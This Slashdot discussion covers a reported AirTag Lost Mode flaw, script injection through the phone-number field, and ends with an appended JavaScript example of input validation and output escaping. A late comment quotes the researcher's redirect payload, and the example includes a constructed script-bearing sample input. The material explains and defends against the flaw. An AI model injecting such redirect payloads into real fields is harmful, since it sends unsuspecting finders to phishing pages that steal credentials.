
Apple AirTag Bug Enables 'Good Samaritan' Attack (krebsonsecurity.com)

An anonymous reader quotes a report from Krebs On Security: The new $30 AirTag tracking device from Apple has a feature that allows anyone who finds one of these tiny location beacons to scan it with a mobile phone and discover its owner's phone number if the AirTag has been set to lost mode. But according to new research, this same feature can be abused to redirect the Good Samaritan to an iCloud phishing page -- or to any other malicious website. The AirTag's "Lost Mode" lets users alert Apple when an AirTag is missing. Setting it to Lost Mode generates a unique URL at https://found.apple.com/ and allows the user to enter a personal message and contact phone number. Anyone who finds the AirTag and scans it with an Apple or Android phone will immediately see that unique Apple URL with the owner's message.

When scanned, an AirTag in Lost Mode will present a short message asking the finder to call the owner at their specified phone number. This information pops up without asking the finder to log in or provide any personal information. But your average Good Samaritan might not know this. That's important because Apple's Lost Mode doesn't currently stop users from injecting arbitrary computer code into its phone number field -- such as code that causes the Good Samaritan's device to visit a phony Apple iCloud login page. The vulnerability was discovered and reported to Apple by Bobby Rauch, a security consultant and penetration tester based in Boston. Rauch told KrebsOnSecurity the AirTag weakness makes the devices cheap and possibly very effective physical trojan horses.

  • "Apple's Lost Mode doesn't currently stop users from injecting arbitrary computer code into its phone number field"

    That's just shamefully pathetic and sloppy and stupid.

    Even my crap-ass code wouldn't allow that.

    • "Apple's Lost Mode doesn't currently stop users from injecting arbitrary computer code into its phone number field"

      That's just shamefully pathetic and sloppy and stupid.

      Even my crap-ass code wouldn't allow that.

      Clearly the problem is Apple isn't paying their programmers enough money. When you go cheap, this is what happens.

    • "Apple's Lost Mode doesn't currently stop users from injecting arbitrary computer code into its phone number field"

      That's just shamefully pathetic and sloppy and stupid.

      Even my crap-ass code wouldn't allow that.

      So you think it isn't just as stupid for the recipient's phone not to sanitize input data?

      • So you think it isn't just as stupid for the recipient's phone not to sanitize input data?

        No, I think it's stupid that the app the developers wrote didn't screen for that.

        As for the phone, I don't know if it has enough brains to determine when a field should only take numbers. Mine doesn't. I can go to lots of forms on the web and enter all kinds of shit into all sorts of fields. Unless the developer restricts what goes in there, I don't see how my phone would know or be responsible.

        Should your PC's keyboard restrict what you type into a field? No, and a phone is no different. Your phone doesn't

        • So you think it isn't just as stupid for the recipient's phone not to sanitize input data?

          No, I think it's stupid that the app the developers wrote didn't screen for that.

          As for the phone, I don't know if it has enough brains to determine when a field should only take numbers. Mine doesn't. I can go to lots of forms on the web and enter all kinds of shit into all sorts of fields. Unless the developer restricts what goes in there, I don't see how my phone would know or be responsible.

          Should your PC's keyboard restrict what you type into a field? No, and a phone is no different. Your phone doesn't know what kind of field you're entering stuff into, so why would it restrict what you enter?

          In short, it's not the phone's fault per se, since they're using an app it's really on the shoulders of the app developer.

          Ok, I'll give you that. The code processing the web-form should be sanitizing the input for that Text Field.

  • and don’t scan any AirTags either.

    • More like don't log into iCloud login pages that are not on apple.com or iCloud.com. Check the URL. Hint: keychain will enable you to auto-enter the password into the correct page. If suspicious, check the cert.
    • But it was so hard to resist that one I found in a parking lot labeled “Bitcoin wallet”! Next you’ll be telling me I shouldn’t have opened those e-mails from the prince of Nigeria, either.

    • by lazarus ( 2879 )

      Or scan any randomly-found QR codes?

  • by dgatwood ( 11270 ) on Wednesday September 29, 2021 @05:41PM (#61846179) Homepage Journal

    No good deed goes unpunished.

    • by AmiMoJo ( 196126 )

      AirTags are not a good deed, and this is another classic Apple fuck-up.

      The exploit is using the fact that Apple doesn't properly validate the input when you enter a phone number for the tag, and then doesn't properly validate the data from the tag when displaying it on your phone. So two failures to validate, which seems to be a common theme with Apple. Over the years we have seen them not rate limit iCloud password guesses, and multiple instances of iOS exploits using malformed web pages or SMS messages.

      As

      • by dgatwood ( 11270 )

        AirTags are not a good deed, and this is another classic Apple fuck-up.

        I meant returning them.

        Apple should have made them an open standard and got Google to implement support in Android so that at least anyone with a phone will be alerted if they are being covertly tracked. They managed to cooperate on COVID contact tracing using Bluetooth. But no, it's an Apple exclusive and only iPhones will warn you if you are being stalked.

        Apple shouldn't have bothered to sabotage the companies that already build very similar products, and should have instead just worked with them to create a shared iOS experience for all of their trackers that works better than those other manufacturers' apps, to make iOS better, rather than using their rather large market power to take over another market by force.

        Compared with that, Apple's almost unwavering failure to support open standards since S.J. died is a minor evil.

  • By the way, your new iPad looks delicious!
    Would you like some jelly to go with that?

  • They talk about putting "computer code" in the phone number field. What "computer code" ?! Is it HTML and JS? Is the client trying to render the contents of the field as HTML and interpret any potentially present JS?!
    Is Apple not sanitizing the input of the phone field ? Does anyone has a link with how this actually works ?
    • Yes, TFA has a link [medium.com] to the code used.

      It's this, wrapped in "script" tags (which I can't include because they trigger the ASCII art filter):

      window.location='https://10.0.1.137:8000/indexer.html';var a = '';
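The two missing layers the thread keeps coming back to are validating the phone-number field before it is stored and treating the stored value as text, not markup, when it is rendered. The following is an added example, not Apple's code and not from Rauch's write-up; the function names, the acceptance rule (optional leading "+", 7 to 15 digits, common separators) and the sample inputs are all assumptions chosen for illustration.

```javascript
// Added example (not Apple's or Rauch's code): input validation for a
// phone-number field plus output encoding, the two layers whose absence the
// thread discusses. Function names, policy and sample inputs are constructed.

// Layer 1: accept only something that can plausibly be a phone number.
// Digits, an optional leading "+", and common separators; 7..15 digits in
// total (E.164 allows at most 15). Anything else is rejected before storage.
function validatePhoneNumber(raw) {
  if (typeof raw !== "string" || raw.length > 32) return null;
  const trimmed = raw.trim();
  if (!/^\+?[0-9][0-9 ().-]*$/.test(trimmed)) return null;
  const digits = trimmed.replace(/[^0-9]/g, "");
  if (digits.length < 7 || digits.length > 15) return null;
  // Canonical form: keep the "+" if present, drop separators.
  return (trimmed.startsWith("+") ? "+" : "") + digits;
}

// Layer 2: whatever was stored is still encoded as data when rendered,
// so a stray "<script>" shows up as literal text instead of executing.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Builds the "lost item" card. The free-text message is always escaped, and
// the tel: link is built only from a value that passed validation.
function renderLostModeCard({ message, phone }) {
  const safeMessage = escapeHtml(message);
  const canonical = validatePhoneNumber(phone);
  const contact = canonical
    ? `<a href="tel:${canonical}">${escapeHtml(canonical)}</a>`
    : "<em>no valid contact number</em>";
  return `<p>${safeMessage}</p><p>Call: ${contact}</p>`;
}

// Constructed sample input of the script-bearing kind the thread describes
// (the host is a placeholder, not a real target).
const hostilePhone =
  "<script>window.location='https://example.invalid/';</script>";

// Stand-alone demonstration: the hostile value is rejected at validation,
// and even when it is smuggled into the message it is rendered inert.
console.log(validatePhoneNumber("+1 (617) 555-0100"));   // +16175550100
console.log(validatePhoneNumber(hostilePhone));          // null
console.log(renderLostModeCard({ message: hostilePhone, phone: "5550100" }));
```

The point of keeping both layers is that each catches what the other misses: validation rejects the bad value at the source, while output encoding protects the finder's phone even if some other path (an older client, a bug in the validator, a different field) lets markup through.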
